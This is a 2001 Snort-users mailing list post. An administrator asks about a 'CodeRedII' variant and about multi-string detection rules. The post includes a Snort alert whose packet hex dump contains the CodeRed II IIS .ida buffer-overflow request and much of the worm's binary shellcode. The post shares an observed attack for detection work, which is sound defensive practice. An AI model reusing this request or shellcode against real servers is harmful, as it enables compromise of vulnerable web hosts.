Snort mailing list archives

CodeRedII again?

From: Pontus Joakimsson <jpontus () ess nec de>
Date: Wed, 22 Aug 2001 14:35:52 +0200
Hi,

 Had an warez "attack" on our web/ftp server last two days (thinking of writing some
 rules for detecting it, can be interesting?), and noticed quite some Code Red alerts
 in the logs, the thing I reacted on was that it contained the string "CodeRedII"...
 Anyone knows about this variant?

 btw. does anyone knows if its possible to add more then one "detection-string" to a rule?

Regards,
  Pontus Joakimsson

------------------------------------------------------------
[**] WEB-IIS ISAPI .ida attempt [**]
08/22-09:48:13.441655 210.111.15.79:1476 -> x.x.x.x 80
TCP TTL:104 TOS:0x0 ID:13484 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x3F4EE63E  Ack: 0x15A91A99  Win: 0x4470  TcpLen: 20
------------------------------------------------------------
0x0000: 08 00 20 85 EF DF 00 C0 95 E0 F0 9B 08 00 45 00  .. ...........E.
0x0010: 05 DC 34 AC 40 00 68 06 A9 41 D2 6F 0F 4F C1 8D  ..4.@.h..A.o.O..
0x0020: 8B E2 05 C4 00 50 3F 4E E6 3E 15 A9 1A 99 50 10  .....P?N.>....P.
0x0030: 44 70 A3 58 00 00 47 45 54 20 2F 64 65 66 61 75  Dp.X..GET /defau
0x0040: 6C 74 2E 69 64 61 3F 58 58 58 58 58 58 58 58 58  lt.ida?XXXXXXXXX
-- SNIP --
-- SNIP --
0x0120: 58 58 58 58 58 58 58 25 75 39 30 39 30 25 75 36  XXXXXXX%u9090%u6
0x0130: 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25  858%ucbd3%u7801%
0x0140: 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64  u9090%u6858%ucbd
0x0150: 33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 36  3%u7801%u9090%u6
0x0160: 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25  858%ucbd3%u7801%
0x0170: 75 39 30 39 30 25 75 39 30 39 30 25 75 38 31 39  u9090%u9090%u819
0x0180: 30 25 75 30 30 63 33 25 75 30 30 30 33 25 75 38  0%u00c3%u0003%u8
0x0190: 62 30 30 25 75 35 33 31 62 25 75 35 33 66 66 25  b00%u531b%u53ff%
0x01A0: 75 30 30 37 38 25 75 30 30 30 30 25 75 30 30 3D  u0078%u0000%u00=
0x01B0: 61 20 20 48 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E  a  HTTP/1.0..Con
0x01C0: 74 65 6E 74 2D 74 79 70 65 3A 20 74 65 78 74 2F  tent-type: text/
0x01D0: 78 6D 6C 0A 43 6F 6E 74 65 6E 74 2D 6C 65 6E 67  xml.Content-leng
0x01E0: 74 68 3A 20 33 33 37 39 20 0D 0A 0D 0A C8 C8 01  th: 3379 .......
0x01F0: 00 60 E8 03 00 00 00 CC EB FE 64 67 FF 36 00 00  .`........dg.6..
0x0200: 64 67 89 26 00 00 E8 DF 02 00 00 68 04 01 00 00  dg.&.......h....
0x0210: 8D 85 5C FE FF FF 50 FF 55 9C 8D 85 5C FE FF FF  ..\...P.U...\...
0x0220: 50 FF 55 98 8B 40 10 8B 08 89 8D 58 FE FF FF FF  P.U..@.....X....
0x0230: 55 E4 3D 04 04 00 00 0F 94 C1 3D 04 08 00 00 0F  U.=.......=.....
0x0240: 94 C5 0A CD 0F B6 C9 89 8D 54 FE FF FF 8B 75 08  .........T....u.
0x0250: 81 7E 30 9A 02 00 00 0F 84 C4 00 00 00 C7 46 30  .~0...........F0
0x0260: 9A 02 00 00 E8 0A 00 00 00 43 6F 64 65 52 65 64  .........CodeRed
0x0270: 49 49 00 8B 1C 24 FF 55 D8 66 0B C0 0F 95 85 38  II...$.U.f.....8
0x0280: FE FF FF C7 85 50 FE FF FF 01 00 00 00 6A 00 8D  .....P.......j..
0x0290: 85 50 FE FF FF 50 8D 85 38 FE FF FF 50 8B 45 08  .P...P..8...P.E.
0x02A0: FF 70 08 FF 90 84 00 00 00 80 BD 38 FE FF FF 01  .p.........8....
0x02B0: 74 68 53 FF 55 D4 FF 55 EC 01 45 84 69 BD 54 FE  thS.U..U..E.i.T.
0x02C0: FF FF 2C 01 00 00 81 C7 2C 01 00 00 E8 D2 04 00  ..,.....,.......
0x02D0: 00 F7 D0 0F AF C7 89 46 34 8D 45 88 50 6A 00 FF  .......F4.E.Pj..
0x02E0: 75 08 E8 05 00 00 00 E9 01 FF FF FF 6A 00 6A 00  u...........j.j.
0x02F0: FF 55 F0 50 FF 55 D0 4F 75 D2 E8 3B 05 00 00 69  .U.P.U.Ou..;...i
0x0300: BD 54 FE FF FF 00 5C 26 05 81 C7 00 5C 26 05 57  .T....\&....\&.W
0x0310: FF 55 E8 6A 00 6A 16 FF 55 8C 6A FF FF 55 E8 EB  .U.j.j..U.j..U..
0x0320: F9 8B 46 34 29 45 84 6A 64 FF 55 E8 8D 85 3C FE  ..F4)E.jd.U...<.
0x0330: FF FF 50 FF 55 C0 0F B7 85 3C FE FF FF 3D D2 07  ..P.U....<...=..
0x0340: 00 00 73 CF 0F B7 85 3E FE FF FF 83 F8 0A 73 C3  ..s....>......s.
0x0350: 66 C7 85 70 FF FF FF 02 00 66 C7 85 72 FF FF FF  f..p.....f..r...
0x0360: 00 50 E8 64 04 00 00 89 9D 74 FF FF FF 6A 00 6A  .P.d.....t...j.j
0x0370: 01 6A 02 FF 55 B8 83 F8 FF 74 F2 89 45 80 6A 01  .j..U....t..E.j.
0x0380: 54 68 7E 66 04 80 FF 75 80 FF 55 A4 59 6A 10 8D  Th~f...u..U.Yj..
0x0390: 85 70 FF FF FF 50 FF 75 80 FF 55 B0 BB 01 00 00  .p...P.u..U.....
0x03A0: 00 0B C0 74 4B 33 DB FF 55 94 3D 33 27 00 00 75  ...tK3..U.=3'..u
0x03B0: 3F C7 85 68 FF FF FF 0A 00 00 00 C7 85 6C FF FF  ?..h.........l..
0x03C0: FF 00 00 00 00 C7 85 60 FF FF FF 01 00 00 00 8B  .......`........
0x03D0: 45 80 89 85 64 FF FF FF 8D 85 68 FF FF FF 50 6A  E...d.....h...Pj
0x03E0: 00 8D 85 60 FF FF FF 50 6A 00 6A 01 FF 55 A0 93  ...`...Pj.j..U..
0x03F0: 6A 00 54 68 7E 66 04 80 FF 75 80 FF 55 A4 59 83  j.Th~f...u..U.Y.
0x0400: FB 01 75 31 E8 00 00 00 00 58 2D D3 03 00 00 6A  ..u1.....X-....j
0x0410: 00 68 EA 0E 00 00 50 FF 75 80 FF 55 AC 3D EA 0E  .h....P.u..U.=..
0x0420: 00 00 75 11 6A 00 6A 01 8D 85 5C FE FF FF 50 FF  ..u.j.j...\...P.
0x0430: 75 80 FF 55 A8 FF 75 80 FF 55 B4 E9 E7 FE FF FF  u..U..u..U......
0x0440: BB 00 00 DF 77 81 C3 00 00 01 00 81 FB 00 00 00  ....w...........
0x0450: 78 75 05 BB 00 00 F0 BF 60 E8 0E 00 00 00 8B 64  xu......`......d
0x0460: 24 08 64 67 8F 06 00 00 58 61 EB D9 64 67 FF 36  $.dg....Xa..dg.6
0x0470: 00 00 64 67 89 26 00 00 66 81 3B 4D 5A 75 E3 8B  ..dg.&..f.;MZu..
0x0480: 4B 3C 81 3C 0B 50 45 00 00 75 D7 8B 54 0B 78 03  K<.<.PE..u..T.x.
0x0490: D3 8B 42 0C 81 3C 03 4B 45 52 4E 75 C5 81 7C 03  ..B..<.KERNu..|.
0x04A0: 04 45 4C 33 32 75 BB 33 C9 49 8B 72 20 03 F3 FC  .EL32u.3.I.r ...
0x04B0: 41 AD 81 3C 03 47 65 74 50 75 F5 81 7C 03 04 72  A..<.GetPu..|..r
0x04C0: 6F 63 41 75 EB 03 4A 10 49 D1 E1 03 4A 24 0F B7  ocAu..J.I...J$..
0x04D0: 0C 0B C1 E1 02 03 4A 1C 8B 04 0B 03 C3 89 44 24  ......J.......D$
0x04E0: 24 64 67 8F 06 00 00 58 61 C3 E8 51 FF FF FF 89  $dg....Xa..Q....
0x04F0: 5D FC 89 45 F8 E8 0D 00 00 00 4C 6F 61 64 4C 69  ]..E......LoadLi
0x0500: 62 72 61 72 79 41 00 FF 75 FC FF 55 F8 89 45 F4  braryA..u..U..E.
0x0510: E8 0D 00 00 00 43 72 65 61 74 65 54 68 72 65 61  .....CreateThrea
0x0520: 64 00 FF 75 FC FF 55 F8 89 45 F0 E8 0D 00 00 00  d..u..U..E......
0x0530: 47 65 74 54 69 63 6B 43 6F 75 6E 74 00 FF 75 FC  GetTickCount..u.
0x0540: FF 55 F8 89 45 EC E8 06 00 00 00 53 6C 65 65 70  .U..E......Sleep
0x0550: 00 FF 75 FC FF 55 F8 89 45 E8 E8 17 00 00 00 47  ..u..U..E......G
0x0560: 65 74 53 79 73 74 65 6D 44 65 66 61 75 6C 74 4C  etSystemDefaultL
0x0570: 61 6E 67 49 44 00 FF 75 FC FF 55 F8 89 45 E4 E8  angID..u..U..E..
0x0580: 14 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72  ....GetSystemDir
0x0590: 65 63 74 6F 72 79 41 00 FF 75 FC FF 55 F8 89 45  ectoryA..u..U..E
0x05A0: E0 E8 0A 00 00 00 43 6F 70 79 46 69 6C 65 41 00  ......CopyFileA.
0x05B0: FF 75 FC FF 55 F8 89 45 DC E8 10 00 00 00 47 6C  .u..U..E......Gl
0x05C0: 6F 62 61 6C 46 69 6E 64 41 74 6F 6D 41 00 FF 75  obalFindAtomA..u
0x05D0: FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C 6F 62  ..U..E......Glob
0x05E0: 61 6C 41 64 64 41 74 6F 6D 41                    alAddAtomA

--------------------------------------------------------

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
http://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:

CodeRedII again? Pontus Joakimsson (Aug 22)
- Re: CodeRedII again? Ryan Russell (Aug 22)
- Re: CodeRedII again? Skip Carter (Aug 22)